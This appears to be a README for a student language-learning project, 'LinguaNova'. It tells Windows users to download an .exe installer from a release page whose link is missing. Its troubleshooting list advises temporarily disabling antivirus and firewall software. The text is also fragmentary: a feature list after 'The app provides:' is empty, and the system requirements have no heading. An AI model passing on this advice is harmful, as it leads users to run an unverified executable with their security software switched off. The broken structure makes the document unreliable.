This project was developed as part of the PIDEV – 4th Year Software Engineering Program at Esprit School of Engineering (Academic Year 2025–2026). Esprit-PIDEV-4SAE5-2026-LinguaNova is an e-learning platform designed to help users learn new languages effectively. It runs on Windows and offers a friendly interface for all users, including those with visual impairments.
To get started with Esprit-PIDEV-4SAE5-2026-LinguaNova on your Windows computer, follow these steps carefully.

This link opens the page where the latest versions are available. The releases include the installation files you will need.
On the release page, look for the latest version. The file names usually end with .exe which is the installer for Windows.
Click the installer file to start downloading it to your computer. The file size should be around 50-100 MB depending on the version.
Once the download finishes:
- Double-click the
.exefile. - Follow the on-screen steps to install the program.
- Choose the default options unless you have a reason to change them.

- Processor: 1.8 GHz dual-core or better
- RAM: 4 GB or more

Using a keyboard and mouse is recommended for easier navigation.
LinguaNova uses simple interfaces and learning tools to guide users through language lessons. The app provides:

- Make sure your Windows is updated.
- Restart your computer and try opening the app again.
- Check your internet connection if some parts do not load.
- Disable third-party antivirus or firewall temporarily as they can block the app.
- Reinstall the program if you notice errors during startup.

Once you run the app:
- Create a new user profile with your name and language preferences.
- Follow the on-screen tutorial that shows you main features.
- Choose a language you want to learn.
- Start with the introductory lesson.

The app keeps track of your progress. You can resume lessons anytime.
